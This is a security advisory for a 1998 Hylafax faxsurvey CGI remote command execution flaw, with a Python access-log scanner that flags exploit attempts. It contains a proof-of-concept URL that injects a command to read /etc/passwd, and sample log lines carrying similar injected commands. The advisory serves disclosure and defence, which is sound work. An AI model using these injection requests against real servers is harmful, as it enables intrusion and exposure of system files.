Hylafax Faxsurvey Remote Command Execution Vulnerability
BID:2056
Info
| Bugtraq ID: | 2056 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Aug 04 1998 12:00AM |
| Updated: | Aug 04 1998 12:00AM |
| Credit: | Posted to BugTraq on August 4, 1998 by Tom <[email protected]> |
| Vulnerable: | Hylafax Hylafax 4.0 pl2 |
| Not Vulnerable: | |
Discussion
Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Unpatched versions of Hylafax ship with an insecure CGI script, faxsurvey, which passes its query string to a shell and therefore allows remote command execution with the privileges of the web server process. It can be exploited simply by passing the command as the script's parameter (see the Exploit / POC section). Consequences could include web site defacement and the exploitation of locally accessible vulnerabilities to gain further privileges.
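As an added defender-side example (not part of the original advisory, and not Hylafax code): the Python scan below reads web-server access-log lines and flags every request to a faxsurvey CGI, rating a hit "high" when the URL-decoded query string looks like a command line (leading absolute path, whitespace, or shell metacharacters) and "info" otherwise. The log lines, client addresses and the `scan` helper are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/1998:12:00:01 +0000] "GET /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd HTTP/1.0" 200 1234
10.0.0.7 - - [04/Aug/1998:12:00:02 +0000] "GET /index.html HTTP/1.0" 200 512
10.0.0.9 - - [04/Aug/1998:12:00:03 +0000] "GET /cgi-bin/faxsurvey HTTP/1.0" 200 800
10.0.0.11 - - [04/Aug/1998:12:00:04 +0000] "GET /cgi-bin/faxsurvey?%2Fbin%2Fls+-la+%2Ftmp HTTP/1.0" 200 300
"""

# Pull the request line out of a log entry: method, path (with query), protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# A query that starts with an absolute path, or carries shell metacharacters or
# whitespace, is treated as an attempted command rather than a CGI argument.
COMMAND_RE = re.compile(r'^/|[;|&`$<>\\\s]')


def scan(log_text):
    """Return one finding per request to a faxsurvey CGI script.

    severity 'high': the decoded query string looks like a shell command line
    severity 'info': any other request to the script (it should be disabled anyway)
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group("path").partition("?")
        if not path.endswith("/faxsurvey"):
            continue
        # unquote_plus handles both %20 and '+' encodings of a space.
        decoded = unquote_plus(query)
        severity = "high" if query and COMMAND_RE.search(decoded) else "info"
        findings.append({
            "line": lineno,
            "client": line.split()[0],
            "query": decoded,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['severity']:4} client={f['client']} query={f['query']!r}")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents. The "info" hits are worth keeping: the fix for this issue is to remove or replace the script, so any traffic to it at all shows that the vulnerable CGI is still deployed.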
Exploit / POC
http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
Solution / Fix
Solution:
Disable the affected script and/or upgrade to a newer version of Hylafax.
Hylafax Hylafax 4.0 pl2
- Hylafax security-patch.sh: http://www.hylafax.org/patches/security-patch.sh
References
References:
- Hylafax Homepage (Hylafax)
- Patches (Hylafax)